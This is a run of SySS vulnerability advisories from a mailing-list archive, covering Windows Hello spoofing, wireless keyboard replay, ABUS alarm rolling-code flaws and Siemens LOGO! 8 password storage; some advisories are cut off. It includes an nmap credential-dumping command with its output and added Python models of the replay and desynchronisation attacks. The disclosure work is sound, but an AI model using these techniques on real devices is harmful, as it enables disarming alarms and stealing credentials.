2016-10-18: Manufacturer presents new software version with fixed
security issues
2017-04-10: Public release of security advisory



References:

[1] Product website for Password Safe and Repository Enterprise
http://www.passwordsafe.de/en/products/business/enterprise-edition.html
[2] SySS Security Advisory SYSS-2015-036
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-036.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-BEGIN PGP SIGNATURE-

iQIzBAEBCgAdFiEE0fCgNfBs5nXNuQUU2aS/ajStTasFAljrOqMACgkQ2aS/a

[FD] [SYSS-2017-027] Microsoft Windows Hello Face Authentication - Authentication Bypass by Spoofing (CWE-290)

2017-12-19 Thread Matthias Deeg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2017-027
Product: Microsoft Windows Hello Face Authentication
Manufacturer: Microsoft
Affected Version(s): Windows 10 Pro (Version 1709, OS Build 16299.19)
 Windows 10 Pro (Version 1703, OS Build 15063.726)
 Windows 10 Pro (Version 1703, OS Build 15063.674)
 Windows 10 Pro (Version 1703, OS Build 15063.483)
 Windows 10 Pro (Version 1607, OS Build 14393.1914)
 Windows 10 Pro (Version 1607, OS Build 14393.1770)
 Windows 10 Pro (Version 1511, OS Build 10586.1232)
Tested Version(s): Windows 10 Pro (Version 1709, OS Build 16299.19)
   Windows 10 Pro (Version 1703, OS Build 15063.726)
   Windows 10 Pro (Version 1703, OS Build 15063.674)
   Windows 10 Pro (Version 1703, OS Build 15063.483)
   Windows 10 Pro (Version 1607, OS Build 14393.1914)
   Windows 10 Pro (Version 1607, OS Build 14393.1770)
   Windows 10 Pro (Version 1511, OS Build 10586.1232)
Vulnerability Type: Authentication Bypass by Spoofing (CWE-290)
Risk Level: High
Solution Status: Fixed on Windows 10 branches 1703 and 1709 with
 enabled "enhanced anti-spoofing" feature
Manufacturer Notification: 2017-10-20
Solution Date: 2017-12-18
Public Disclosure: 2017-12-18
CVE Reference: Not yet assigned
Authors of Advisory: Matthias Deeg and Philipp Buchegger (SySS GmbH)



Overview:

Microsoft Windows 10 offers a biometric authentication mechanism
using "near infrared" face recognition technology with specific Windows
Hello compatible cameras.

The manufacturer Microsoft describes the face authentication feature as
follows (see [1]):

"Microsoft face authentication in Windows 10 is an enterprise-grade
identity verification mechanism that's integrated into the Windows
Biometric Framework (WBF) as a core Microsoft Windows component called
Windows Hello. Windows Hello face authentication utilizes a camera
specially configured for near infrared (IR) imaging to authenticate and
unlock Windows devices as well as unlock your Microsoft Passport."

Further information about how Windows Hello works and its metrics
concerning false acceptance rate (FAR) and false rejection rate (FRR)
can also be found on the Microsoft website (see [2]).

Due to an insecure implementation of the biometric face recognition in
some Windows 10 versions, it is possible to bypass the Windows Hello
face authentication via a simple spoofing attack using a modified
printed photo of an authorized person.



Vulnerability Details:

SySS GmbH discovered that the Microsoft Windows Hello face
authentication using near infrared cameras in some Windows 10 versions
is vulnerable to simple spoofing attacks.

By using a modified printed photo of an authorized user, an unauthorized
attacker is able to log in to or unlock a locked Windows 10 system as
this spoofed authorized user.

Thus, by having access to a suitable photo of an authorized person
(frontal face photo), Windows Hello face authentication can easily be
bypassed with little effort, enabling unauthorized access to the Windows
system.

Both the default Windows Hello configuration and Windows Hello with the
"enhanced anti-spoofing" feature enabled are vulnerable to the described
spoofing attack on different Windows 10 versions and can be bypassed. If
"enhanced anti-spoofing" is enabled, a slightly different modified photo
with other attributes has to be used depending on the targeted Windows
10 version, but the additional effort for an attacker is negligible. In
general, the simple spoofing attack is less reliable when the "enhanced
anti-spoofing" feature is enabled.



Proof of Concept (PoC):

SySS GmbH could successfully bypass the configured Windows Hello user
authentication with face recognition on two Windows 10 systems using a
modified printed photo (paper printout) of an authorized user.

For example, the spoofing attack was performed against a laptop device
(Dell Latitude E7470) running Windows 10 Pro (Version 1703) with a
Windows Hello compatible webcam [3] and against a Microsoft Surface
Pro 4 device [4] running Windows 10 Pro (Version 1607) with the built-in
camera.

Of the two test devices, only the Microsoft Surface Pro 4 supported the
"enhanced anti-spoofing" feature of Windows 10. The LilBit USB IR camera
that was used only supported the default configuration and could not be
used with the more secure face recognition settings.

The default Windows Hello configuration could successfully be bypassed
on both test devices with all tested Windows 10 versions. The more
secure 

[FD] [SYSS-2017-026] Microsoft Surface Hub Keyboard - Cryptographic Issues (CWE-310), Insufficient Protection against Replay Attacks

2018-01-30 Thread Matthias Deeg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2017-026
Product: Microsoft Surface Hub Keyboard
Manufacturer: Microsoft
Affected Version(s): n/a
Tested Version(s): n/a
Vulnerability Type: Cryptographic Issues (CWE-310)
Insufficient Protection against Replay Attacks
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2017-10-20
Solution Date: -
Public Disclosure: 2018-01-29
CVE Reference: Not yet assigned
Authors of Advisory: Matthias Deeg (SySS GmbH)



Overview:

The Microsoft Surface Hub Keyboard is a wireless keyboard that can be
used in combination with the digital whiteboard/collaboration system
Microsoft Surface Hub (see [1]).

Due to an insecure implementation of the encrypted data communication,
the Microsoft Surface Hub Keyboard is vulnerable to replay attacks with
certain restrictions.



Vulnerability Details:

The SySS GmbH found out that the Microsoft Surface Hub Keyboard is prone
to replay attacks with some limitations.

An attacker can sniff the AES-encrypted data packets of the 2.4 GHz
radio communication sent by the keyboard to the receiver (USB dongle)
and replay the recorded communication data causing the same effect as
the original data communication.

According to test results of the SySS GmbH, the Microsoft Surface Hub
Keyboard and its USB dongle have implemented a replay protection based
on an incrementing packet counter. But the used window for valid packet
counter values is large enough to perform a replay attack if there were
not too many data packets caused by further keystrokes between the
attacker's recording and the playback. The same behavior was found in
the previously tested wireless keyboard Microsoft Wireless Desktop 2000
(see [2]).
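The following Python simulation is an added example; it is not SySS's
simple_replay.py and not the actual Microsoft protocol, and the window
size, the counter semantics and the packet model are assumptions. It shows
the counter-window behaviour described here and in SYSS-2016-043: recorded
ciphertext is accepted again as long as the victim has not typed enough in
between to move the acceptance window past the recorded counters, whereas
a receiver that insists on a strictly increasing counter rejects every
replayed packet. The attacker never needs the AES key, because the
ciphertext is resent unchanged.

```python
"""
Added example: a model of the replay-protection behaviour described in
SYSS-2017-026 and SYSS-2016-043.  Not SySS code and not the Microsoft
protocol; window size and packet model are constructed assumptions.
"""
WINDOW = 64  # assumed size of the acceptance window


class WindowedReceiver:
    """Models the weak behaviour: a counter anywhere within +/- WINDOW of the
    last accepted value is taken, and the dongle keeps no memory of which
    counter values have already been used."""

    def __init__(self, window=WINDOW):
        self.window = window
        self.last = 0
        self.typed = []  # keystrokes the dongle would pass to the host

    def receive(self, counter, ciphertext):
        if not (self.last - self.window <= counter <= self.last + self.window):
            return False
        self.last = max(self.last, counter)
        self.typed.append(ciphertext)  # dongle decrypts and types the key
        return True


class StrictReceiver(WindowedReceiver):
    """Hardened variant: a counter must exceed the last accepted one, so a
    recorded packet can never be accepted a second time."""

    def receive(self, counter, ciphertext):
        if counter <= self.last:
            return False
        self.last = counter
        self.typed.append(ciphertext)
        return True


class Keyboard:
    """Transmitter with a monotonically incrementing packet counter."""

    def __init__(self):
        self.counter = 0

    def send(self, key):
        self.counter += 1
        # The stand-in below represents the AES ciphertext; the attacker only
        # ever records and resends it, never decrypts it.
        return (self.counter, f"enc({key})")


def replay_scenario(receiver_cls, keystrokes_between):
    """Record a password entry, let the victim type `keystrokes_between`
    further keys, then replay the recording.  Returns (accepted, total)."""
    kbd, rx = Keyboard(), receiver_cls()
    recording = [kbd.send(k) for k in "secret"]
    for pkt in recording:
        rx.receive(*pkt)
    for i in range(keystrokes_between):
        rx.receive(*kbd.send(f"k{i}"))
    accepted = sum(rx.receive(*pkt) for pkt in recording)
    return accepted, len(recording)


if __name__ == "__main__":
    for between in (0, 40, 60, 100):
        print("windowed, keystrokes in between:", between, replay_scenario(WindowedReceiver, between))
    print("strict:", replay_scenario(StrictReceiver, 0))
```

With the assumed window of 64, the whole recorded password is typed again
if fewer than about 60 further packets were sent; above that the window
has moved on and the replay fails, which is the restriction the advisory
describes. The strict receiver rejects the replay even when nothing was
typed in between.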

A replay attack against the keyboard can, for example, be used to gain
unauthorized access to a computer system that is operated with a
vulnerable keyboard. In this attack scenario, an attacker records the
radio communication during a password-based user authentication of his
or her victim, for instance during a login to the operating system or
during unlocking a screen lock. At an opportune moment when the victim's
computer system is unattended, the attacker approaches the victim's
computer and replays the previously recorded AES-encrypted data
communication for the password-based user authentication and thereby
gains unauthorized access to the victim's system. Knowledge of the AES
key is not required, as the recorded ciphertext is replayed unchanged.



Proof of Concept (PoC):

SySS GmbH could successfully perform a replay attack as described in the
previous section using the USB radio dongle Crazyradio PA (see [3]) and
the proof-of-concept software tool simple_replay.py that is part of the
SySS nRF24 Playset (see [4]).



Solution:

According to information from the manufacturer, the reported security
issue does not meet the requirements for a security patch.

For further information, please contact the manufacturer.



Disclosure Timeline:

2017-10-20: Vulnerability reported to manufacturer
2017-10-20: Manufacturer acknowledges e-mail with SySS security advisory
2017-11-30: E-mail from manufacturer with open questions
2017-12-01: E-mail to manufacturer concerning open questions
2017-12-08: E-mail from manufacturer with open questions regarding
attack scenarios and preconditions
2017-12-11: E-mail to manufacturer concerning open questions, attack
scenarios, and preconditions
2017-12-11: E-mail from manufacturer that the reported security issue
and its exploitability does not meet the bar for a security
patch
2017-12-13: E-mail to manufacturer explaining - from a SySS point of
view - the feasibility of actual replay attacks that exploit
the reported security vulnerability
2018-01-29: Public release of security advisory



References:

[1] Product website for Microsoft Surface Hub
https://www.microsoft.com/en-us/surface/devices/surface-hub/overview
[2] SySS Security Advisory SYSS-2016-043
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-043.txt
[3] Product website for Crazyradio PA
https://www.bitcraze.io/crazyradio-pa/
[4] SySS nRF24 Playset
https://github.com/SySS-Research/nrf24-playset
[5] SySS Security Advisory SYSS-2017-026
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-026.txt
[6] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

This security vulnerability was found

[FD] [SYSS-2018-035]: ABUS Secvest Remote Control - Missing Encryption of Sensitive Data (CWE-311)

2019-03-26 Thread Matthias Deeg
Advisory ID: SYSS-2018-035
Product: ABUS Secvest Remote Control (FUBE50014, FUBE50015)
Manufacturer: ABUS
Affected Version(s): n/a
Tested Version(s): n/a
Vulnerability Type: Missing Encryption of Sensitive Data (CWE-311)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2018-11-21
Solution Date: -
Public Disclosure: 2019-03-25
CVE Reference: CVE-2019-9862
Authors of Advisory: Matthias Deeg (SySS GmbH), Thomas Detert



Overview:

ABUS Secvest FUBE50014 and FUBE50015 are wireless remote controls for
the ABUS Secvest wireless alarm system.

Some of the device features as described by the manufacturer are
(see [1]):

"
* User-friendly remote control with easily identifiable symbols
* Features ‘arm’, ‘disarm’ and ‘status query’ keys
* 8 LEDs provide an overview and display current system status
* Button for custom configuration available (Secvest wireless alarm
  system only)
* Optional manual panic alarm available (Secvest wireless alarm system
  only)
* Encrypted signal transmission
* Rolling Code
  Thanks to the rolling code process this product is protected against
  so-called replay attacks. All controlling signals between this product
  and the Secvest alarm panel are in individualised and thus, are not
  able to be reproduced by third parties. This process is protected
  from third party tampering, and exceeds the requirements of the
  DIN EN 50131-1 level 2 security standard.
"

Due to the missing "Encrypted signal transmission", an attacker is able
to eavesdrop on sensitive data in cleartext, for instance the current
rolling code state.



Vulnerability Details:

Thomas Detert found out that the claimed "Encrypted signal transmission"
of the Secvest wireless remote control FUBE50014 is not present at all.

Thus, an attacker observing radio signals of an ABUS FUBE50014
wireless remote control is able to see all sensitive data of
transmitted packets in cleartext and can analyze the used packet format
and the communication protocol.

For instance, this security issue could successfully be exploited to
observe the current rolling code state of the wireless remote control
and to deduce the cryptographically weak rolling code algorithm in use
(see SySS security advisory SYSS-2018-034 [2]).

SySS found out that the new ABUS Secvest remote control FUBE50015 is
also affected by this security vulnerability.



Proof of Concept (PoC):

Thomas Detert developed a Teensy-based PoC tool using a CC1101 sub-1GHz
transceiver that allows disarming the alarm system in an unauthorized
way. He provided his tool including documentation and source to SySS
GmbH for responsible disclosure purposes.

SySS GmbH could successfully perform a disarming attack against an ABUS
Secvest wireless alarm system by exploiting the unencrypted signal
transmission of the ABUS Secvest wireless remote controls FUBE50014 and
FUBE50015 and the predictable rolling code implementation, using either
Mr. Detert's PoC tool, a Python tool developed for the RFCat-based radio
dongle YARD Stick One (see [3]), or an eZ430-Chronos (see [4]) with a
specially developed firmware.

Successful disarming attacks against an ABUS Secvest wireless alarm
system are shown in our SySS proof-of-concept video "ABUS Secvest
Rolling Code PoC Attack" [7].



Solution:

SySS GmbH is not aware of a solution for this reported security
vulnerability.



Disclosure Timeline:

2018-11-21: Vulnerability reported to manufacturer
2018-11-28: Vulnerability reported to manufacturer once more
2018-12-12: E-mail to ABUS support asking if they are going to give
some feedback regarding the reported security issue
2018-12-12: Phone call with ABUS support, the reported security
advisories were forwarded to the ABUS Security Center
Support
2018-12-12: E-mail to ABUS Security Center Support asking if they are
going to give some feedback regarding the reported security
issue
2019-01-14: Updated information regarding remote control ABUS Secvest
FUBE50015
2019-03-25: Public release of security advisory



References:

[1] Product website for ABUS Secvest wireless remote control

https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Control-devices-and-extensions/Secvest-Wireless-Remote-Control2
[2] SySS Security Advisory SYSS-2018-034

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-034.txt
[3] Product website YARD Stick One
https://greatscottgadgets.com/yardstickone/
[4] Product website for 

[FD] [SYSS-2018-034]: ABUS Secvest - Rolling Code - Predictable from Observable State (CWE-341)

2019-03-26 Thread Matthias Deeg
Advisory ID: SYSS-2018-034
Product: ABUS Secvest (FUAA5)
Manufacturer: ABUS
Affected Version(s): v3.01.01
Tested Version(s): v3.01.01
Vulnerability Type: Rolling Code - Predictable from Observable State
(CWE-341)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2018-11-21
Solution Date: -
Public Disclosure: 2019-03-25
CVE Reference: CVE-2019-9863
Authors of Advisory: Matthias Deeg (SySS GmbH), Thomas Detert



Overview:

ABUS Secvest (FUAA5) is a wireless alarm system with different
features.

Some of the supported features as described by the manufacturer are
(see [1]):

"
* Convenient operation via the app (Android/iOS), integrated web
  browser and also at the alarm panel
* For up to 50 users with freely selectable control options
  (code/chip key/remote control)
* Active intrusion protection in combination with additional mechatronic
  wireless window/door locks
* Video verification of alarms via email, push notifications or via the
  app
* Up to 48 individually identifiable wireless detectors, eight control
  panels, 50 remote controls
* Integrated dialling device
* VdS Home certified and EN 50131-1 Level 2
* Alarm verification via the integration of up to six IP cameras
* 32 additional wireless outputs for flexible event control
* Switching to monitoring station via protocols possible
"

Due to the use of an insecure algorithm for rolling codes, an attacker
is able to predict valid future rolling codes and can thus remotely
control the ABUS Secvest wireless alarm system in an unauthorized way.



Vulnerability Details:

Thomas Detert found out that the rolling codes implemented as replay
protection (see SySS security advisory SYSS-2016-117 [2]) in the radio
communication protocol used by the ABUS Secvest wireless alarm system
(FUAA5) and its remote controls (FUBE50014, FUBE50015) are
cryptographically weak. Thus, an attacker observing the unencrypted radio
signals of an ABUS FUBE50014 or FUBE50015 wireless remote control
(see SySS security advisory SYSS-2018-035 [6]) is able to deduce the
implemented rolling code algorithm and to correctly predict valid future
rolling codes.

This enables an attacker to remotely control affected wireless alarm
systems in an unauthorized manner, for instance disarming the wireless
alarm system at will.



Proof of Concept (PoC):

Thomas Detert developed a Teensy-based PoC tool using a CC1101 sub-1GHz
transceiver that allows disarming the alarm system in an unauthorized
way. He provided his tool including documentation and source to SySS
GmbH for responsible disclosure purposes.

SySS GmbH could successfully perform a disarming attack against an ABUS
Secvest wireless alarm system by exploiting the unencrypted signal
transmission of the ABUS Secvest wireless remote controls FUBE50014 and
FUBE50015 and the predictable rolling code implementation using either
Mr. Detert's PoC tool, a developed Python tool for the RFCat-based radio
dongle YARD Stick One (see [3]), or an eZ430-Chronos (see [4]) with a
specially developed firmware.

Successful disarming attacks against an ABUS Secvest wireless alarm
system are shown in our SySS proof-of-concept video "ABUS Secvest
Rolling Code PoC Attack" [8].



Solution:

SySS GmbH is not aware of a solution for this reported security
vulnerability.



Disclosure Timeline:

2018-11-21: Vulnerability reported to manufacturer
2018-11-28: Vulnerability reported to manufacturer once more
2018-12-12: E-mail to ABUS support asking if they are going to give
some feedback regarding the reported security issue
2018-12-12: Phone call with ABUS support, the reported security
advisories were forwarded to the ABUS Security Center
Support
2018-12-12: E-mail to ABUS Security Center Support asking if they are
going to give some feedback regarding the reported security
issue
2019-01-14: Updated information regarding remote control ABUS Secvest
FUBE50015
2019-03-25: Public release of security advisory



References:

[1] Product website for ABUS Secvest wireless alarm system

https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Alarm-panels-and-kits/Secvest-Wireless-Alarm-System
[2] SySS Security Advisory SYSS-2016-117

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-117.txt
[3] Product website YARD Stick One
https://greatscottgadgets.com/yardstickone/
[4] Product website for Texas Instruments eZ430-Chronos
http://www.ti.com/tool/EZ430-CHRONOS
[5] Sy

[FD] [SYSS-2018-036]: ABUS Secvest Remote Control - Denial of Service - Uncontrolled Resource Consumption (CWE-400)

2019-03-26 Thread Matthias Deeg
Advisory ID: SYSS-2018-036
Product: ABUS Secvest Remote Control (FUBE50014, FUBE50015)
Manufacturer: ABUS
Affected Version(s): n/a
Tested Version(s): n/a
Vulnerability Type: Denial of Service - Uncontrolled Resource
Consumption (CWE-400)
Risk Level: Low
Solution Status: Open
Manufacturer Notification: 2018-11-21
Solution Date: -
Public Disclosure: 2019-03-25
CVE Reference: CVE-2019-9860
Authors of Advisory: Matthias Deeg (SySS GmbH), Thomas Detert



Overview:

ABUS Secvest FUBE50014 and FUBE50015 are wireless remote controls for
the ABUS Secvest wireless alarm system.

Some of the device features as described by the manufacturer are
(see [1]):

"
* User-friendly remote control with easily identifiable symbols
* Features ‘arm’, ‘disarm’ and ‘status query’ keys
* 8 LEDs provide an overview and display current system status
* Button for custom configuration available (Secvest wireless alarm
  system only)
* Optional manual panic alarm available (Secvest wireless alarm system
  only)
* Encrypted signal transmission
* Rolling Code
  Thanks to the rolling code process this product is protected against
  so-called replay attacks. All controlling signals between this product
  and the Secvest alarm panel are in individualised and thus, are not
  able to be reproduced by third parties. This process is protected
  from third party tampering, and exceeds the requirements of the
  DIN EN 50131-1 level 2 security standard.
"

Due to unencrypted signal communication and predictability of rolling
codes, an attacker can "desynchronize" an ABUS Secvest wireless remote
control regarding its controlled Secvest wireless alarm system, so that
commands sent by the remote control are not accepted anymore.



Vulnerability Details:

Thomas Detert found out that the claimed "Encrypted signal transmission"
of the Secvest wireless remote control FUBE50014 is not present (see
SySS security advisory SYSS-2018-035 [2]) and that the implemented
rolling codes are predictable (see SySS security advisory SYSS-2018-034
[3]).

By exploiting these two security issues, an attacker can simply
desynchronize a wireless remote control by observing the current rolling
code state, generating many valid rolling codes, and using them before
the original wireless remote control does.

The Secvest wireless alarm system will ignore commands sent by the
wireless remote control until the generated rolling code happens to
match the window of valid rolling code values again. Depending on the
number of rolling codes used by the attacker, a resynchronization
without actually reconfiguring the wireless remote control could take
quite a lot of time and ineffective button presses.

SySS found out that the new ABUS Secvest remote control FUBE50015 is
also affected by this security vulnerability.



Proof of Concept (PoC):

Thomas Detert developed a Teensy-based PoC tool using a CC1101 sub-1GHz
transceiver that allows disarming the alarm system in an unauthorized
way. He provided his tool including documentation and source to SySS
GmbH for responsible disclosure purposes.

Based on Mr. Detert's PoC tool, SySS GmbH developed a Python tool for
the RFCat-based radio dongle YARD Stick One (see [4]) for demonstrating
this simple denial-of-service (DoS) attack against the ABUS Secvest
wireless remote controls FUBE50014 and FUBE50015. This tool simply
generates many valid rolling codes based on the currently observed state
and uses them, resulting in the desynchronization of the original
wireless remote control.



Solution:

SySS GmbH is not aware of a solution for this reported security
vulnerability.



Disclosure Timeline:

2018-11-21: Vulnerability reported to manufacturer
2018-11-28: Vulnerability reported to manufacturer once more
2018-12-12: E-mail to ABUS support asking if they are going to give
some feedback regarding the reported security issue
2018-12-12: Phone call with ABUS support, the reported security
advisories were forwarded to the ABUS Security Center
Support
2018-12-12: E-mail to ABUS Security Center Support asking if they are
going to give some feedback regarding the reported security
issue
2019-01-14: Updated information regarding remote control ABUS Secvest
FUBE50015
2019-03-25: Public release of security advisory



References:

[1] Product website for ABUS Secvest wireless remote control

https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Control-devices-and-extensions/Secvest-Wireless-Remote-Control2
[2] Sy
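
The receiver window and the desynchronization mechanism described in the
advisory above, as an added abstract model in Python that is not part of
the advisory and is not the ABUS Secvest algorithm. The window size, the
device secret, and the counter-as-code scheme are constructed assumptions;
the keyed variant is included only to show why a code that is a pure
function of observable state is the root of the problem.

```python
import hashlib
import hmac
from typing import Optional, Tuple

# Assumed receiver acceptance window: a constructed value for this model,
# not a parameter taken from the advisory.
WINDOW = 16


def tag_for(secret: Optional[bytes], counter: int) -> bytes:
    """Authentication tag transmitted alongside the counter.

    secret=None models a predictable scheme whose code is a pure function of
    observable state (here simply the counter itself, as a constructed
    stand-in). A keyed tag (HMAC over the counter) cannot be derived from
    observed frames alone.
    """
    data = counter.to_bytes(4, "big")
    if secret is None:
        return data
    return hmac.new(secret, data, hashlib.sha256).digest()[:4]


class Receiver:
    """Alarm panel side: a frame is accepted only if its counter lies in
    (last_accepted, last_accepted + WINDOW] and its tag verifies."""

    def __init__(self, secret: Optional[bytes], start: int = 0) -> None:
        self.secret = secret
        self.last = start

    def accept(self, counter: int, tag: bytes) -> bool:
        if not (self.last < counter <= self.last + WINDOW):
            return False
        if not hmac.compare_digest(tag, tag_for(self.secret, counter)):
            return False
        self.last = counter  # the window slides forward on every accepted frame
        return True


class Remote:
    """Legitimate remote control: increments its counter on every press."""

    def __init__(self, secret: Optional[bytes], start: int = 0) -> None:
        self.secret = secret
        self.counter = start

    def press(self) -> Tuple[int, bytes]:
        self.counter += 1
        return self.counter, tag_for(self.secret, self.counter)


def burn_codes(receiver: Receiver, observed_counter: int, n: int) -> int:
    """Model of the desynchronization: a party that only observed the last
    counter on the air sends the next n codes computable without the secret
    (i.e. with secret=None). Returns how many of them the receiver accepted."""
    accepted = 0
    for c in range(observed_counter + 1, observed_counter + 1 + n):
        if receiver.accept(c, tag_for(None, c)):
            accepted += 1
    return accepted


def presses_until_resync(receiver: Receiver, remote: Remote,
                         limit: int = 100_000) -> int:
    """Number of legitimate presses (wasted ones included) until the receiver
    accepts a frame from the remote again."""
    for presses in range(1, limit + 1):
        if receiver.accept(*remote.press()):
            return presses
    raise RuntimeError("remote did not resynchronize within limit")


def simulate(secret: Optional[bytes], burned: int) -> Tuple[int, int]:
    """Run one scenario; returns (codes accepted from the observer, presses
    the legitimate remote needs afterwards)."""
    remote = Remote(secret)
    panel = Receiver(secret)
    counter, tag = remote.press()       # one legitimate press ...
    assert panel.accept(counter, tag)   # ... is accepted and observed on the air
    accepted = burn_codes(panel, counter, burned)
    return accepted, presses_until_resync(panel, remote)


if __name__ == "__main__":
    # Predictable codes: every burned code is accepted, and each one costs the
    # owner one more ineffective press before the remote works again.
    print("predictable:", simulate(None, 500))  # (500, 501)
    # Keyed codes: nothing derived from the observed counter verifies, the
    # window does not move, and the next legitimate press is accepted.
    print("keyed:", simulate(b"constructed-device-secret", 500))  # (0, 1)
```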

[FD] [SYSS-2019-014]: Siemens LOGO! 8 - Storing Passwords in a Recoverable Format (CWE-257)

2019-05-29 Thread Matthias Deeg
Advisory ID: SYSS-2019-014
Product: LOGO!
Manufacturer: Siemens
Affected Version(s): LOGO! 8 (all versions)
Tested Version(s): LOGO! 8, 6ED1052-2MD00-0BA8 FS:03, 0BA8.Standard V1.08.03
Vulnerability Type: Storing Passwords in a Recoverable Format (CWE-257)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2019-04-04
Solution Date: 2019-05-14 (recommended mitigation by manufacturer)
Public Disclosure: 2019-05-29
CVE Reference: CVE-2019-10921
Authors of Advisory: Manuel Stotz (SySS GmbH), Matthias Deeg (SySS GmbH)



Overview:

Siemens LOGO! is a programmable logic controller (PLC) for small
automation tasks.

The manufacturer describes the product as follows (see [1]):

"Simple installation, minimum wiring, user-friendly programming: You can
easily implement small automation projects with LOGO!, the intelligent
logic module from Siemens. The LOGO! Logic Module saves space in the
control cabinet, and lets you easily implement functions, such as
time-delay switches, time relays, counters and auxiliary relays."

Due to storing passwords in a recoverable format on LOGO! 8 PLCs, an
attacker can gain access to configured passwords as cleartext.



Vulnerability Details:

SySS GmbH found out that passwords are stored in a recoverable format on
LOGO! 8 PLCs.

Thus, if an attacker finds a way to retrieve this password data, for
instance exploiting the security vulnerabilities described in the SySS
security advisories SYSS-2019-012 [2] and SYSS-2019-013 [3], direct
access to cleartext passwords is given.



Proof of Concept (PoC):

SySS GmbH could successfully extract sensitive data such as configured
passwords as cleartext from a LOGO! 8 using a developed Nmap script.

The following Nmap output exemplarily shows extracting cleartext
password data from a LOGO! 8 PLC:

$ nmap -p 10005 --script slig.nse 192.168.10.112
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-16 17:21 CEST
Nmap scan report for 192.168.10.112
Host is up (0.00044s latency).

PORT  STATE SERVICE
10005/tcp open  stel
| slig: Gathered Siemens LOGO!8 access details and passwords
| User: LSCUser
| Password: S3cret1
| Enabled: True
| User: AppUser
| Password: S3cret2
| Enabled: True
| User: WebUser
| Password: S3cret3
| Enabled: True
| User: TDUser
| Password: S3cret4
| Enabled: True
| Protection: Password
| Program password: SECRET
|_MMC serial: \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds

A successful attack against a LOGO! 8 extracting all configured
passwords is demonstrated in our SySS PoC video [7].



Solution:

In the publicly released Siemens Security Advisory SSA-542701 [5],
the manufacturer Siemens recommends applying a defense-in-depth concept,
including the protection concept outlined in the system manual, as a
mitigation for reducing the risk of the described security issue.



Disclosure Timeline:

2019-04-04: Vulnerability reported to manufacturer
2019-04-04: Manufacturer confirms receipt of security advisory and
asks for referenced Nmap script
2019-04-04: SySS provides PoC Nmap script
2019-05-14: Public release of Siemens Security Advisory SSA-542701
2019-05-29: Public release of SySS security advisory



References:

[1] Product website for Siemens LOGO!

https://new.siemens.com/global/en/products/automation/systems/industrial/plc/logo.html
[2] SySS Security Advisory SYSS-2019-012

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-012.txt
[3] SySS Security Advisory SYSS-2019-013

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-013.txt
[4] SySS Security Advisory SYSS-2019-014

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-014.txt
[5] Siemens Security Advisory SSA-542701
https://cert-portal.siemens.com/productcert/pdf/ssa-542701.pdf
[6] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/
[7] SySS Proof-of-Concept Video "Siemens LOGO! 8 PLC Password Hacking"
https://youtu.be/TpH4EABGYCs



Credits:

This security vulnerability was found by Manuel Stotz of SySS GmbH.

E-Mail: manuel.stotz (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Manuel_Stotz.asc
Key fingerprint = F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D



Disclaimer:

The information provided in this security 

[FD] [SYSS-2019-012]: Siemens LOGO! 8 - Use of Hard-coded Cryptographic Key (CWE-321)

2019-05-29 Thread Matthias Deeg
Advisory ID: SYSS-2019-012
Product: LOGO!
Manufacturer: Siemens
Affected Version(s): LOGO! 8 (all versions)
Tested Version(s): LOGO! 8, 6ED1052-2MD00-0BA8 FS:03, 0BA8.Standard V1.08.03
Vulnerability Type: Use of Hard-coded Cryptographic Key (CWE-321)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2019-04-04
Solution Date: 2019-05-14 (recommended mitigation by manufacturer)
Public Disclosure: 2019-05-29
CVE Reference: CVE-2019-10920
Authors of Advisory: Manuel Stotz, Matthias Deeg (SySS GmbH)



Overview:

Siemens LOGO! is a programmable logic controller (PLC) for small
automation tasks.

The manufacturer describes the product as follows (see [1]):

"Simple installation, minimum wiring, user-friendly programming: You can
easily implement small automation projects with LOGO!, the intelligent
logic module from Siemens. The LOGO! Logic Module saves space in the
control cabinet, and lets you easily implement functions, such as
time-delay switches, time relays, counters and auxiliary relays."

Due to the use of a hard-coded cryptographic key, an attacker can put
the integrity and confidentiality of encrypted data of all LOGO! 8 PLCs
using this key at risk, for instance decrypting network communication
during a man-in-the-middle attack.



Vulnerability Details:

SySS GmbH found out that LOGO! PLCs use a static, hard-coded
cryptographic 3DES key for protecting sensitive information, like
network communication and configuration data.

For instance, this key can be found within the LOGO! Soft Comfort
software.

